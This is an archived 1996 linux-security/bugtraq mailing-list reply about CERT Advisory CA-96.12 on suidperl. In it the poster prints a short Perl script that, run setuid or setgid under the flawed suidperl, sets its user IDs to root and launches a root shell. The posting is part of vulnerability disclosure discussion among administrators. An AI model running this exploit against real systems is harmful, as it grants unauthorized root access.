[866] in linux-security and linux-alert archive

home help back first fref pref prev next nref lref last post

Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)

daemon@ATHENA.MIT.EDU (Jon Lewis)
Sat Jun 29 16:03:47 1996

Date: Sat, 29 Jun 1996 02:24:49 -0400 (EDT)
From: Jon Lewis <jlewis@inorganic5.fdt.net>
To: ichudov@algebra.com
cc: linux-security@tarsier.cv.nrao.edu, bugtraq@netspace.org
In-Reply-To: <199606290411.XAA32291@manifold.algebra.com>

On Fri, 28 Jun 1996 ichudov@algebra.com wrote:

> 
> What is the exploit?

Run this as a suid or sgid script.  It doesn't matter what user or group 
it's suid/sgid to...it gets root access.

#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");

Is it just me...or does it give people the willies knowing such an easy 
to exploit hole was on their systems...perhaps for years.

------------------------------------------------------------------
 Jon Lewis                      |  Mime attachments are OK
 jlewis@inorganic5.fdt.net      |  But please ask before sending 
 http://inorganic5.fdt.net      |  unsolicited huge files.
________Finger jlewis@inorganic5.fdt.net for PGP public key_______

home help back first fref pref prev next nref lref last post